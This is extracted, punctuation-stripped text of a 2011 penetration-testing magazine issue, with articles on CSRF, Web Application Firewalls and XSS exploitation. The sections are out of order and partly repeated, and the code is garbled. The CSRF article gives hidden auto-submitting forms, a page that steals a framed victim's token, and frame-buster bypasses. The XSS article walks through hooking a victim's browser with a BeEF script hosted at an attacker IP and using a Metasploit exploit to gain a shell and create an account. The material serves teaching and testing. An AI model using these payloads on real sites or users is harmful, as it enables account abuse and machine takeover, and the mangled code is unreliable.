Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
